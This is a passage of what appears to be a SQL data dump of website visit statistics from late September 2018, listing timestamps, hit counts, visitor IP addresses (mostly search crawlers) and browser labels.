(309902,1538190367,1,1,0,0,'54.36.148.122','other'),(309903,1538190520,3,3,0,0,'141.8.142.74','other'),(309904,1538190547,2,2,0,0,'178.154.244.62','other'),(309905,1538190558,1,1,0,0,'178.154.244.34','other'),(309906,1538190631,1,1,0,0,'54.36.148.177','other'),(309907,1538191154,1,1,0,0,'141.8.183.206','other'),(309908,1538191280,1,1,0,0,'8.29.198.27','other'),(309909,1538191439,5,5,0,0,'141.8.142.74','other'),(309910,1538191502,1,1,0,0,'54.36.149.12','other'),(309911,1538191744,3,3,0,0,'178.154.171.88','other'),(309912,1538191753,5,5,0,0,'87.250.224.46','other'),(309913,1538191756,1,1,0,0,'178.154.244.62','other'),(309914,1538191777,1,1,0,0,'54.36.148.161','other'),(309915,1538191803,2,2,0,0,'178.154.244.34','other'),(309916,1538191935,1,1,0,0,'66.249.64.137','chrome'),(309917,1538192233,1,1,0,0,'54.36.149.17','other'),(309918,1538193332,1,1,0,0,'54.36.148.49','other'),(309919,1538193383,1,1,0,0,'82.145.209.222','other'),(309920,1538193760,1,1,0,0,'54.36.148.180','other'),(309921,1538193920,1,1,0,0,'54.36.148.115','other'),(309922,1538194461,1,1,0,0,'54.36.148.60','other'),(309923,1538194636,1,1,0,0,'54.36.148.227','other'),(309924,1538194803,2,2,0,0,'141.8.142.74','other'),(309925,1538194808,2,2,0,0,'213.32.23.95','other'),(309926,1538194884,1,1,0,0,'216.244.66.241','other'),(309927,1538195294,1,1,0,0,'54.36.148.236','other'),(309928,1538195322,1,1,0,0,'157.55.39.71','other'),(309929,1538195435,1,1,0,0,'54.36.148.120','other'),(309930,1538195542,1,1,0,0,'54.36.148.29','other'),(309931,1538195739,1,1,0,0,'54.36.148.83','other'),(309932,1538195933,1,1,0,0,'54.36.149.55','other'),(309933,1538196680,1,1,0,0,'141.8.142.74','other'),(309934,1538196814,1,1,0,0,'54.36.148.198','other'),(309935,1538196870,1,1,0,0,'54.36.149.85','other'),(309936,1538197046,1,1,0,0,'178.154.171.88','other'),(309937,1538197206,1,1,0,0,'54.36.148.97','other'),(309938,1538197636,1,1,0,0,'54.36.149.83','other'),(309939,1538197657,2,2,0,0,'54.165.59.7','other'),(309940,1538197671,1,1,0,0,'54.36.148.165','other'),(309941,1538197696,2,2,0,0,'8.29.198.26','other'),(309942,1538198133,1,1,0,0,'54.36.148.178','other'),(309943,1538198253,1,1,0,0,'95.163.255.167','other'),(309944,1538198669,1,1,0,0,'54.36.148.230','other'),(309945,1538199066,1,1,0,0,'54.36.149.85','other'),(309946,1538199069,1,1,0,0,'54.36.149.61','other'),(309947,1538199291,1,1,0,0,'95.163.255.97','other'),(309948,1538199479,1,1,0,0,'54.36.149.69','other'),(309949,1538199660,1,1,0,0,'54.36.148.56','other'),(309950,1538200096,1,1,0,0,'157.55.39.71','other'),(309951,1538200190,1,1,0,0,'178.154.171.88','other'),(309952,1538200224,1,1,0,0,'54.36.149.13','other'),(309953,1538200358,2,2,0,0,'141.8.142.74','other'),(309954,1538201033,1,1,0,0,'157.55.39.71','other'),(309955,1538201417,2,2,0,0,'178.154.171.88','other'),(309956,1538201493,1,1,0,0,'87.250.224.46','other'),(309957,1538201674,1,1,0,0,'54.36.148.104','other'),(309958,1538201698,1,1,0,0,'54.36.148.132','other'),(309959,1538201814,2,2,0,0,'66.249.70.29','chrome'),(309960,1538201842,1,1,0,0,'54.36.148.148','other'),(309961,1538201997,1,1,0,0,'82.145.209.215','other'),(309962,1538202116,1,1,0,0,'8.29.198.25','other'),(309963,1538202155,1,1,0,0,'54.36.149.35','other'),(309964,1538202273,3,3,0,0,'141.8.142.74','other'),(309965,1538202557,1,1,0,0,'54.36.148.188','other'),(309966,1538202704,1,1,0,0,'54.36.148.139','other'),(309967,1538202736,1,1,0,0,'54.36.148.117','other'),(309968,1538202756,1,1,0,0,'54.36.148.243','other'),(309969,1538202766,1,1,0,0,'66.249.70.29','chrome'),(309970,1538202821,1,1,0,0,'54.36.149.54','other'),(309971,1538202950,1,1,0,0,'95.73.32.116','chrome'),(309972,1538203009,1,1,0,0,'54.36.148.246','other'),(309973,1538203242,1,1,0,0,'54.36.149.56','other'),(309974,1538203343,2,2,0,0,'141.8.142.74','other'),(309975,1538203642,1,1,0,0,'54.36.149.106','other'),(309976,1538203765,1,1,0,0,'54.36.149.33','other'),(309977,1538203841,1,1,0,0,'54.36.148.30','other'),(309978,1538204230,1,1,0,0,'54.36.148.130','other'),(309979,1538204433,1,1,0,0,'54.36.148.148','other'),(309980,1538204506,2,2,0,0,'178.154.171.88','other'),(309981,1538204514,4,4,0,0,'141.8.142.74','other'),(309982,1538204766,1,1,0,0,'54.36.148.138','other'),(309983,1538204856,1,1,0,0,'54.36.149.101','other'),(309984,1538205238,2,2,0,0,'87.250.224.46','other'),(309985,1538205269,1,1,0,0,'178.154.200.41','other'),(309986,1538205296,1,1,0,0,'54.36.149.46','other'),(309987,1538205337,1,1,0,0,'141.8.142.50','other'),(309988,1538205475,2,2,0,0,'141.8.142.74','other'),(309989,1538205824,1,1,0,0,'185.234.217.188','msie'),(309990,1538205903,55,55,0,0,'199.47.87.142','other'),(309991,1538205960,1,1,0,0,'91.196.121.15','chrome'),(309992,1538207263,1,1,0,0,'54.36.148.210','other'),(309993,1538207297,2,2,0,0,'54.36.148.92','other'),(309994,1538207467,1,1,0,0,'178.154.171.55','other'),(309995,1538208033,1,1,0,0,'54.36.148.173','other'),(309996,1538208093,1,1,0,0,'54.36.148.237','other'),(309997,1538208199,1,1,0,0,'54.36.148.199','other'),(309998,1538208348,1,1,0,0,'54.36.149.23','other'),(309999,1538208441,1,1,0,0,'54.36.148.92','other'),(310000,1538208526,1,1,0,0,'8.29.198.25','other'),(310001,1538208576,1,1,0,0,'54.36.149.16','other'),(310002,1538208638,1,1,0,0,'8.29.198.27','other'),(310003,1538208839,1,1,0,0,'216.244.66.241','other'),(310004,1538208894,1,1,0,0,'66.249.64.137','chrome'),(310005,1538209336,1,1,0,0,'13.66.139.0','other'),(310006,1538209826,1,1,0,0,'157.55.39.71','other'),(310007,1538210031,1,1,0,0,'54.36.148.70','other'),(310008,1538210393,2,2,0,0,'91.209.11.236','other'),(310009,1538210412,1,1,0,0,'54.36.148.48','other'),(310010,1538210447,1,1,0,0,'66.249.64.135','chrome'),(310011,1538210745,1,1,0,0,'54.36.148.69','other'),(310012,1538210838,1,1,0,0,'204.12.197.234','other'),(310013,1538210962,1,1,0,0,'54.36.149.12','other'),(310014,1538211377,1,1,0,0,'40.77.167.136','other'),(310015,1538211444,1,1,0,0,'216.244.66.241','other'),(310016,1538211511,1,1,0,0,'54.36.148.152','other'),(310017,1538211638,2,2,0,0,'91.209.11.236','other'),(310018,1538211777,1,1,0,0,'54.36.149.42','other'),(310019,1538212003,1,1,0,0,'54.36.149.23','other'),(310020,1538212159,3,3,0,0,'5.9.151.57','other'),(310021,1538212519,1,1,0,0,'54.36.148.106','other'),(310022,1538212544,1,1,0,0,'95.73.32.116','chrome'),(310023,1538212768,1,1,0,0,'92.113.189.235','chrome'),(310024,1538212949,1,1,0,0,'8.29.198.25','other'),(310025,1538212952,1,1,0,0,'54.36.148.11','other'),(310026,1538213322,1,1,0,0,'91.209.11.236','other'),(310027,1538213567,1,1,0,0,'216.244.66.241','other'),(310028,1538213801,1,1,0,0,'54.36.148.13','other'),(310029,1538214011,1,1,0,0,'54.36.148.158','other'),(310030,1538214476,1,1,0,0,'91.209.11.236','other'),(310031,1538214526,1,1,0,0,'54.36.148.212','other'),(310032,1538214816,1,1,0,0,'54.36.149.76','other'),(310033,1538215184,1,1,0,0,'54.36.148.190','other'),(310034,1538216026,1,1,0,0,'54.36.148.246','other'),(310035,1538216064,1,1,0,0,'54.36.148.64','other'),(310036,1538216211,1,1,0,0,'54.36.148.192','other'),(310037,1538216311,1,1,0,0,'216.244.66.241','other'),(310038,1538216410,1,1,0,0,'54.36.149.93','other'),(310039,1538216477,1,1,0,0,'54.36.148.217','other'),(310040,1538216691,1,1,0,0,'54.36.148.103','other'),(310041,1538216740,3,3,0,0,'178.154.171.88','other'),(310042,1538216744,3,3,0,0,'141.8.142.74','other'),(310043,1538216751,1,1,0,0,'87.250.224.46','other'),(310044,1538217223,1,1,0,0,'54.36.148.23','other'),(310045,1538217449,1,1,0,0,'54.36.148.205','other'),(310046,1538217681,1,1,0,0,'54.36.149.57','other'),(310047,1538217721,1,1,0,0,'54.36.148.45','other'),(310048,1538218035,1,1,0,0,'54.36.148.161','other'),(310049,1538218067,1,1,0,0,'216.244.66.241','other'),(310050,1538218082,1,1,0,0,'54.36.148.158','other'),(310051,1538218365,1,1,0,0,'54.36.148.49','other'),(310052,1538218493,1,1,0,0,'54.36.148.190','other'),(310053,1538218576,1,1,0,0,'207.46.13.81','other'),(310054,1538219314,1,1,0,0,'54.36.148.143','other'),(310055,1538219355,1,1,0,0,'8.29.198.27','other'),(310056,1538219456,1,1,0,0,'8.29.198.25','other'),(310057,1538219627,1,1,0,0,'54.36.148.249','other'),(310058,1538220042,1,1,0,0,'54.36.149.92','other'),(310059,1538220255,1,1,0,0,'54.36.148.254','other'),(310060,1538220595,1,1,0,0,'54.36.148.160','other'),(310061,1538220603,1,1,0,0,'54.36.148.36','other'),(310062,1538220660,1,1,0,0,'54.36.149.103','other'),(310063,1538220720,1,1,0,0,'54.36.149.62','other'),(310064,1538220789,1,1,0,0,'54.36.148.86','other'),(310065,1538221080,1,1,0,0,'54.36.149.16','other'),(310066,1538221156,1,1,0,0,'54.36.149.5','other'),(310067,1538221578,1,1,0,0,'54.36.148.186','other'),(310068,1538221703,1,1,0,0,'54.36.149.68','other'),(310069,1538221720,1,1,0,0,'54.36.148.55','other'),(310070,1538221988,1,1,0,0,'54.36.149.38','other'),(310071,1538222224,1,1,0,0,'54.36.148.189','other'),(310072,1538222278,1,1,0,0,'54.36.148.250','other'),(310073,1538222313,1,1,0,0,'54.36.149.98','other'),(310074,1538222444,1,1,0,0,'216.244.66.241','other'),(310075,1538222951,1,1,0,0,'54.36.148.197','other'),(310076,1538222981,1,1,0,0,'54.36.148.218','other'),(310077,1538223087,12,12,0,0,'141.8.142.74','other'),(310078,1538223095,7,7,0,0,'178.154.171.88','other'),(310079,1538223243,1,1,0,0,'178.154.200.41','other'),(310080,1538223337,1,1,0,0,'87.250.224.46','other'),(310081,1538223355,1,1,0,0,'216.244.66.241','other'),(310082,1538223618,1,1,0,0,'54.36.149.48','other'),(310083,1538223625,1,1,0,0,'66.249.64.135','chrome'),(310084,1538223716,1,1,0,0,'37.9.113.182','other'),(310085,1538223789,1,1,0,0,'8.29.198.27','other'),(310086,1538223826,1,1,0,0,'54.36.148.196','other'),(310087,1538223863,1,1,0,0,'54.36.149.98','other'),(310088,1538223871,1,1,0,0,'178.154.244.62','other'),(310089,1538224197,1,1,0,0,'54.36.149.8','other'),(310090,1538224237,4,4,0,0,'141.8.142.74','other'),(310091,1538224570,1,1,0,0,'54.36.148.234','other'),(310092,1538224762,1,1,0,0,'87.250.224.46','other'),(310093,1538224836,1,1,0,0,'54.36.148.191','other'),(310094,1538225005,1,1,0,0,'95.163.255.92','other'),(310095,1538225035,3,3,0,0,'80.241.214.124','other'),(310096,1538225053,1,1,0,0,'216.244.66.241','other'),(310097,1538225179,1,1,0,0,'54.36.148.47','other'),(310098,1538225533,3,3,0,0,'141.8.142.74','other'),(310099,1538225588,1,1,0,0,'192.3.194.234','chrome'),(310100,1538225616,1,1,0,0,'120.35.38.178','other'),(310101,1538225676,1,1,0,0,'66.249.70.27','chrome'),(310102,1538225855,1,1,0,0,'54.36.149.20','other'),(310103,1538225903,1,1,0,0,'54.36.149.47','other'),(310104,1538225904,5,5,0,0,'178.154.171.88','other'),(310105,1538225940,1,1,0,0,'54.36.148.252','other'),(310106,1538226419,1,1,0,0,'87.250.224.46','other'),(310107,1538226436,2,2,0,0,'216.244.66.241','other'),(310108,1538226496,7,7,0,0,'141.8.142.74','other'),(310109,1538227180,1,1,0,0,'54.36.148.38','other'),(310110,1538227432,1,1,0,0,'178.154.244.62','other'),(310111,1538227579,1,1,0,0,'54.36.148.27','other'),(310112,1538227619,1,1,0,0,'54.36.149.92','other'),(310113,1538227719,1,1,0,0,'180.76.15.33','other'),(310114,1538227844,1,1,0,0,'66.249.70.27','chrome'),(310115,1538227871,2,2,0,0,'178.154.171.88','other'),(310116,1538228146,1,1,0,0,'178.154.244.24','other'),(310117,1538228172,6,6,0,0,'141.8.142.74','other'),(310118,1538228380,1,1,0,0,'216.244.66.241','other'),(310119,1538228742,1,1,0,0,'178.154.244.34','other'),(310120,1538228787,1,1,0,0,'54.36.149.46','other'),(310121,1538228913,1,1,0,0,'54.36.148.25','other'),(310122,1538228927,1,1,0,0,'91.196.178.102','chrome'),(310123,1538229121,1,1,0,0,'54.36.149.60','other'),(310124,1538229159,2,2,0,0,'178.154.244.62','other'),(310125,1538229191,5,5,0,0,'141.8.142.74','other'),(310126,1538229469,1,1,0,0,'54.36.149.31','other'),(310127,1538229475,5,5,0,0,'178.154.171.88','other'),(310128,1538229609,1,1,0,0,'54.36.148.159','other'),(310129,1538229703,1,1,0,0,'54.36.148.210','other'),(310130,1538229753,2,2,0,0,'87.250.224.46','other'),(310131,1538229950,1,1,0,0,'54.36.149.66','other'),(310132,1538230015,1,1,0,0,'54.36.148.154','other'),(310133,1538230165,1,1,0,0,'54.36.148.41','other'),(310134,1538230183,1,1,0,0,'8.29.198.26','other'),(310135,1538230192,5,5,0,0,'141.8.142.74','other'),(310136,1538230276,1,1,0,0,'8.29.198.25','other'),(310137,1538230388,2,2,0,0,'167.114.1.124','other'),(310138,1538230556,1,1,0,0,'95.163.255.93','other'),(310139,1538230558,1,1,0,0,'95.163.255.99','other'),(310140,1538230613,5,5,0,0,'178.154.171.88','other'),(310141,1538230759,1,1,0,0,'54.36.149.10','other'),(310142,1538230816,1,1,0,0,'91.196.178.35','chrome'),(310143,1538231019,1,1,0,0,'54.36.149.25','other'),(310144,1538231038,1,1,0,0,'178.154.244.24','other'),(310145,1538231096,4,4,0,0,'141.8.142.74','other'),(310146,1538231446,1,1,0,0,'91.196.178.74','chrome'),(310147,1538231477,1,1,0,0,'54.36.148.87','other'),(310148,1538231487,1,1,0,0,'207.46.13.81','other'),(310149,1538231610,1,1,0,0,'54.36.148.104','other'),(310150,1538231779,1,1,0,0,'54.36.148.150','other'),(310151,1538232190,1,1,0,0,'54.36.149.18','other'),(310152,1538232298,1,1,0,0,'54.36.148.70','other'),(310153,1538232802,2,2,0,0,'54.36.149.48','other'),(310154,1538233085,1,1,0,0,'66.249.64.131','chrome'),(310155,1538233132,1,1,0,0,'54.36.149.82','other'),(310156,1538233379,1,1,0,0,'54.36.148.222','other'),(310157,1538233605,1,1,0,0,'54.36.148.150','other'),(310158,1538233696,1,1,0,0,'54.36.149.40','other'),(310159,1538233752,1,1,0,0,'54.36.148.73','other'),(310160,1538233866,1,1,0,0,'216.244.66.241','other'),(310161,1538233973,1,1,0,0,'54.36.148.251','other'),(310162,1538234159,1,1,0,0,'141.8.142.74','other'),(310163,1538234238,1,1,0,0,'54.36.148.16','other'),(310164,1538234262,1,1,0,0,'54.36.148.111','other'),(310165,1538234319,1,1,0,0,'54.36.148.245','other'),(310166,1538234566,1,1,0,0,'54.36.148.250','other'),(310167,1538234612,1,1,0,0,'95.163.255.92','other'),(310168,1538234629,1,1,0,0,'8.29.198.25','other'),(310169,1538234792,1,1,0,0,'54.36.148.82','other'),(310170,1538234922,1,1,0,0,'54.36.148.207','other'),(310171,1538235032,1,1,0,0,'54.36.148.42','other'),(310172,1538235190,1,1,0,0,'54.36.148.54','other'),(310173,1538235211,1,1,0,0,'54.36.148.64','other'),(310174,1538235216,1,1,0,0,'91.209.11.236','other'),(310175,1538235544,1,1,0,0,'54.36.149.4','other'),(310176,1538236395,1,1,0,0,'54.36.149.32','other'),(310177,1538236744,1,1,0,0,'54.36.148.126','other'),(310178,1538236997,1,1,0,0,'54.36.148.155','other'),(310179,1538237024,1,1,0,0,'54.36.148.88','other'),(310180,1538237158,1,1,0,0,'54.36.148.245','other'),(310181,1538237366,1,1,0,0,'54.36.149.65','other'),(310182,1538237437,1,1,0,0,'54.36.148.58','other'),(310183,1538237693,1,1,0,0,'54.36.149.60','other'),(310184,1538237710,1,1,0,0,'54.36.149.24','other'),(310185,1538237766,1,1,0,0,'95.163.255.95','other'),(310186,1538237938,1,1,0,0,'54.36.149.76','other'),(310187,1538238064,1,1,0,0,'178.154.171.88','other'),(310188,1538238090,1,1,0,0,'54.36.149.93','other'),(310189,1538238290,1,1,0,0,'54.36.148.33','other'),(310190,1538238756,1,1,0,0,'54.36.148.99','other'),(310191,1538238835,1,1,0,0,'54.36.148.90','other'),(310192,1538239033,1,1,0,0,'54.36.148.113','other'),(310193,1538239185,1,1,0,0,'66.249.64.131','chrome'),(310194,1538239316,1,1,0,0,'54.36.148.81','other'),(310195,1538239324,1,1,0,0,'51.255.65.46','other'),(310196,1538239375,1,1,0,0,'54.36.148.251','other'),(310197,1538239601,2,2,0,0,'216.244.66.241','other'),(310198,1538240430,1,1,0,0,'54.36.148.17','other'),(310199,1538240556,1,1,0,0,'54.36.148.153','other'),(310200,1538240784,1,1,0,0,'51.255.65.46','other'),(310201,1538240788,1,1,0,0,'54.36.148.210','other'),(310202,1538240802,1,1,0,0,'54.36.148.194','other'),(310203,1538240846,1,1,0,0,'54.36.148.155','other'),(310204,1538241010,1,1,0,0,'8.29.198.25','other'),(310205,1538241101,1,1,0,0,'8.29.198.26','other'),(310206,1538241565,1,1,0,0,'95.163.255.95','other'),(310207,1538241590,1,1,0,0,'54.36.149.52','other'),(310208,1538241691,1,1,0,0,'54.36.148.90','other'),(310209,1538242024,1,1,0,0,'54.36.148.108','other'),(310210,1538242117,1,1,0,0,'54.36.148.93','other'),(310211,1538242186,1,1,0,0,'54.36.149.48','other'),(310212,1538242330,1,1,0,0,'54.36.148.105','other'),(310213,1538243336,1,1,0,0,'95.163.255.94','other'),(310214,1538244089,1,1,0,0,'54.36.148.93','other'),(310215,1538244218,1,1,0,0,'54.36.149.63','other'),(310216,1538245390,1,1,0,0,'141.8.142.74','other'),(310217,1538245464,1,1,0,0,'8.29.198.25','other'),(310218,1538246360,1,0,1,0,'66.249.64.131',''),(310219,1538246590,1,1,0,0,'54.36.148.31','other'),(310220,1538246594,1,1,0,0,'54.36.148.179','other'),(310221,1538246622,1,1,0,0,'66.249.64.135','chrome'),(310222,1538246876,1,1,0,0,'37.9.113.115','other'),(310223,1538246880,1,1,0,0,'141.8.142.74','other'),(310224,1538246883,2,2,0,0,'178.154.171.88','other'),(310225,1538246922,1,1,0,0,'178.154.244.34','other'),(310226,1538246945,1,1,0,0,'178.154.244.62','other'),(310227,1538247006,1,1,0,0,'54.36.148.88','other'),(310228,1538247138,1,1,0,0,'95.163.255.92','other'),(310229,1538247140,1,1,0,0,'95.163.255.95','other'),(310230,1538247821,1,1,0,0,'54.36.148.143','other'),(310231,1538248212,1,1,0,0,'54.36.148.28','other'),(310232,1538248797,1,1,0,0,'54.36.149.59','other'),(310233,1538249305,1,1,0,0,'54.36.148.93','other'),(310234,1538249792,1,1,0,0,'54.36.149.78','other'),(310235,1538249945,1,1,0,0,'66.249.64.131','chrome'),(310236,1538250025,1,1,0,0,'141.8.142.152','other'),(310237,1538250173,2,2,0,0,'141.8.142.74','other'),(310238,1538250216,1,1,0,0,'54.36.148.119','other'),(310239,1538250218,4,4,0,0,'178.154.171.88','other'),(310240,1538250280,1,1,0,0,'54.36.149.61','other'),(310241,1538250471,1,1,0,0,'66.249.70.27','chrome'),(310242,1538250708,1,1,0,0,'54.36.148.62','other'),(310243,1538250941,1,1,0,0,'158.69.251.119','other'),(310244,1538250964,2,1,1,0,'66.249.64.131',''),(310245,1538251110,1,1,0,0,'54.36.148.26','other'),(310246,1538251403,1,1,0,0,'54.36.148.159','other'),(310247,1538251529,1,1,0,0,'54.36.148.35','other'),(310248,1538251611,1,1,0,0,'54.36.148.82','other'),(310249,1538251717,2,2,0,0,'54.36.149.22','other'),(310250,1538251843,1,1,0,0,'8.29.198.25','other'),(310251,1538251859,1,1,0,0,'66.249.64.131','chrome'),(310252,1538251931,1,1,0,0,'8.29.198.27','other'),(310253,1538252103,1,1,0,0,'54.36.148.16','other'),(310254,1538252316,1,1,0,0,'178.154.171.88','other'),(310255,1538252394,1,1,0,0,'54.36.148.94','other'),(310256,1538252398,1,1,0,0,'54.36.148.54','other'),(310257,1538252767,1,1,0,0,'54.36.148.220','other'),(310258,1538252884,1,1,0,0,'66.249.64.131','chrome'),(310259,1538253156,1,1,0,0,'54.36.148.66','other'),(310260,1538253448,1,1,0,0,'216.244.66.241','other'),(310261,1538253542,1,1,0,0,'54.36.149.92','other'),(310262,1538253636,1,1,0,0,'54.36.149.40','other'),(310263,1538253748,1,1,0,0,'54.36.148.193','other'),(310264,1538254003,1,1,0,0,'91.196.178.61','chrome'),(310265,1538254078,1,1,0,0,'66.249.64.135','chrome'),(310266,1538254264,1,1,0,0,'95.163.255.92','other'),(310267,1538254338,1,1,0,0,'54.36.148.166','other'),(310268,1538254361,1,1,0,0,'54.36.148.93','other'),(310269,1538254701,1,1,0,0,'54.36.149.30','other'),(310270,1538254702,1,1,0,0,'54.36.149.86','other'),(310271,1538254778,1,1,0,0,'40.77.167.13','other'),(310272,1538254851,2,2,0,0,'216.244.66.241','other'),(310273,1538254884,18,18,0,0,'95.216.2.253','other'),(310274,1538255152,1,1,0,0,'54.36.149.17','other'),(310275,1538255992,1,1,0,0,'207.46.13.98','other'),(310276,1538256015,2,2,0,0,'66.249.64.131','chrome'),(310277,1538256068,1,1,0,0,'66.249.64.137','chrome'),(310278,1538256096,1,1,0,0,'54.36.148.118','other'),(310279,1538256299,1,1,0,0,'8.29.198.27','other'),(310280,1538256318,1,1,0,0,'54.36.148.205','other'),(310281,1538256945,1,1,0,0,'54.36.148.183','other'),(310282,1538257026,1,1,0,0,'54.36.149.100','other'),(310283,1538257027,2,2,0,0,'66.249.64.135','chrome'),(310284,1538257236,1,1,0,0,'66.249.70.27','chrome'),(310285,1538257250,2,2,0,0,'216.244.66.241','other'),(310286,1538257313,1,1,0,0,'54.36.149.105','other'),(310287,1538257459,1,1,0,0,'54.36.149.65','other'),(310288,1538257471,1,1,0,0,'54.36.149.27','other'),(310289,1538257805,1,1,0,0,'54.36.148.135','other'),(310290,1538257871,1,1,0,0,'54.165.59.7','other'),(310291,1538257960,1,1,0,0,'54.36.148.18','other'),(310292,1538258237,1,1,0,0,'66.249.64.131','chrome'),(310293,1538258795,1,1,0,0,'54.36.148.244','other'),(310294,1538258989,1,1,0,0,'54.36.148.131','other'),(310295,1538259233,1,1,0,0,'54.36.148.14','other'),(310296,1538259300,1,1,0,0,'54.36.148.80','other'),(310297,1538259328,1,1,0,0,'91.242.162.10','other'),(310298,1538259437,1,1,0,0,'66.249.64.135','chrome'),(310299,1538259585,1,1,0,0,'54.36.148.154','other'),(310300,1538259962,1,1,0,0,'54.36.149.57','other'),(310301,1538259997,1,1,0,0,'207.46.13.98','other'),(310302,1538260020,1,1,0,0,'207.46.13.95','other'),(310303,1538260038,1,1,0,0,'54.36.148.224','other'),(310304,1538260499,1,1,0,0,'54.36.148.102','other'),(310305,1538260888,1,1,0,0,'54.36.148.49','other'),(310306,1538260923,1,1,0,0,'54.36.148.236','other'),(310307,1538261007,3,3,0,0,'91.242.162.10','other'),(310308,1538261159,1,1,0,0,'207.46.13.95','other'),(310309,1538261371,1,1,0,0,'54.36.148.134','other'),(310310,1538261467,1,1,0,0,'54.36.148.229','other'),(310311,1538261472,1,1,0,0,'54.36.148.50','other'),(310312,1538261673,1,1,0,0,'66.249.64.137','chrome'),(310313,1538261863,1,1,0,0,'54.36.148.104','other'),(310314,1538261865,1,1,0,0,'66.249.64.135','chrome'),(310315,1538262010,1,1,0,0,'54.36.148.183','other'),(310316,1538262542,1,1,0,0,'216.244.66.241','other'),(310317,1538262635,3,3,0,0,'91.242.162.10','other'),(310318,1538262663,1,1,0,0,'66.249.64.131','chrome'),(310319,1538262671,1,1,0,0,'8.29.198.26','other'),(310320,1538262762,1,1,0,0,'8.29.198.25','other'),(310321,1538262785,11,11,0,0,'51.254.134.178','other'),(310322,1538262819,1,1,0,0,'54.36.148.155','other'),(310323,1538262893,1,1,0,0,'89.31.57.5','other'),(310324,1538262945,1,1,0,0,'148.251.69.139','other'),(310325,1538262975,1,1,0,0,'54.36.149.17','other'),(310326,1538263011,1,1,0,0,'54.36.148.165','other'),(310327,1538263092,1,1,0,0,'54.36.148.253','other'),(310328,1538263108,1,1,0,0,'54.36.148.66','other'),(310329,1538263225,1,1,0,0,'54.36.148.132','other'),(310330,1538263242,1,1,0,0,'180.76.15.27','other'),(310331,1538263357,1,1,0,0,'54.36.148.46','other'),(310332,1538263706,1,1,0,0,'207.46.13.233','other'),(310333,1538263810,1,1,0,0,'54.36.148.139','other'),(310334,1538263881,4,4,0,0,'91.242.162.10','other'),(310335,1538264034,1,1,0,0,'54.36.148.224','other'),(310336,1538264306,1,1,0,0,'54.36.148.193','other'),(310337,1538264439,1,1,0,0,'207.46.13.98','other'),(310338,1538264481,1,1,0,0,'66.249.64.137','chrome'),(310339,1538264638,1,1,0,0,'141.8.132.22','other'),(310340,1538264803,2,2,0,0,'141.8.183.206','other'),(310341,1538264880,1,1,0,0,'178.154.171.4','other'),(310342,1538264897,1,1,0,0,'178.154.171.55','other'),(310343,1538264961,1,1,0,0,'5.45.207.49','other'),(310344,1538265180,1,1,0,0,'178.154.244.34','other'),(310345,1538265198,1,1,0,0,'37.9.113.100','other'),(310346,1538265306,2,2,0,0,'178.154.171.88','other'),(310347,1538265348,1,1,0,0,'54.36.149.37','other'),(310348,1538265350,1,1,0,0,'141.8.142.152','other'),(310349,1538265353,1,1,0,0,'87.250.224.85','other'),(310350,1538265431,2,2,0,0,'216.244.66.241','other'),(310351,1538265456,3,3,0,0,'91.242.162.10','other'),(310352,1538265621,2,2,0,0,'87.250.224.46','other'),(310353,1538265650,1,1,0,0,'37.9.113.157','other'),(310354,1538265658,1,1,0,0,'54.36.148.147','other'),(310355,1538265830,1,1,0,0,'37.9.113.134','other'),(310356,1538265995,1,1,0,0,'37.9.113.115','other'),(310357,1538265999,1,1,0,0,'54.36.148.195','other'),(310358,1538266236,1,1,0,0,'37.9.113.101','other'),(310359,1538266491,1,1,0,0,'54.36.148.159','other'),(310360,1538266775,1,1,0,0,'180.76.15.7','other'),(310361,1538267024,1,1,0,0,'54.36.149.38','other'),(310362,1538267134,1,1,0,0,'8.29.198.26','other'),(310363,1538267268,1,1,0,0,'37.9.113.115','other'),(310364,1538267271,1,1,0,0,'66.249.64.135','chrome'),(310365,1538267431,1,1,0,0,'54.36.149.13','other'),(310366,1538267781,1,1,0,0,'66.249.64.131','chrome'),(310367,1538267852,1,1,0,0,'95.163.255.92','other'),(310368,1538268235,2,2,0,0,'91.242.162.10','other'),(310369,1538268623,1,1,0,0,'141.8.132.22','other'),(310370,1538268732,1,0,1,0,'66.249.64.137',''),(310371,1538268880,1,1,0,0,'54.36.148.61','other'),(310372,1538268937,1,1,0,0,'54.36.148.176','other'),(310373,1538269160,1,1,0,0,'95.163.255.94','other'),(310374,1538269412,1,1,0,0,'37.9.113.115','other'),(310375,1538269530,1,1,0,0,'54.36.148.45','other'),(310376,1538269586,1,1,0,0,'54.36.148.84','other'),(310377,1538269606,1,1,0,0,'91.242.162.10','other'),(310378,1538270310,1,1,0,0,'54.36.148.163','other'),(310379,1538270355,1,1,0,0,'54.36.148.132','other'),(310380,1538270564,1,1,0,0,'54.36.148.62','other'),(310381,1538270565,1,1,0,0,'216.244.66.241','other'),(310382,1538270701,1,1,0,0,'54.36.148.133','other'),(310383,1538270715,1,1,0,0,'54.36.148.216','other'),(310384,1538270726,1,1,0,0,'87.250.224.46','other'),(310385,1538270813,1,1,0,0,'66.249.64.131','chrome'),(310386,1538271015,121,121,0,0,'91.209.51.22','other'),(310387,1538271052,1,1,0,0,'52.53.201.78','chrome'),(310388,1538271178,1,1,0,0,'141.8.142.74','other'),(310389,1538271612,1,1,0,0,'207.46.13.95','other'),(310390,1538271992,1,1,0,0,'54.36.148.235','other'),(310391,1538272238,1,1,0,0,'178.154.171.4','other'),(310392,1538272455,1,1,0,0,'37.9.113.101','other'),(310393,1538272502,2,2,0,0,'5.45.207.58','other'),(310394,1538272782,1,1,0,0,'54.36.149.2','other'),(310395,1538273078,1,1,0,0,'54.36.149.70','other'),(310396,1538273121,1,1,0,0,'54.36.148.184','other'),(310397,1538273299,1,1,0,0,'178.154.244.65','other'),(310398,1538273323,1,1,0,0,'95.163.255.99','other'),(310399,1538273333,1,1,0,0,'54.36.148.24','other'),(310400,1538273485,1,1,0,0,'92.113.189.235','chrome'),(310401,1538273495,1,1,0,0,'8.29.198.27','other'),(310402,1538273580,1,1,0,0,'54.36.148.62','other'),(310403,1538273593,1,1,0,0,'8.29.198.25','other'),(310404,1538273953,1,1,0,0,'54.36.149.58','other'),(310405,1538274041,1,1,0,0,'216.244.66.241','other'),(310406,1538274057,1,1,0,0,'54.36.148.70','other'),(310407,1538274183,1,1,0,0,'54.36.149.71','other'),(310408,1538274486,1,1,0,0,'141.8.142.74','other'),(310409,1538274525,1,1,0,0,'54.36.148.138','other'),(310410,1538274537,1,1,0,0,'54.36.149.74','other'),(310411,1538274819,1,1,0,0,'66.249.70.27','chrome'),(310412,1538274862,1,0,1,0,'66.249.64.131',''),(310413,1538274947,1,1,0,0,'54.36.148.139','other'),(310414,1538275060,1,1,0,0,'178.154.171.88','other'),(310415,1538275076,1,1,0,0,'54.36.149.1','other'),(310416,1538275507,1,1,0,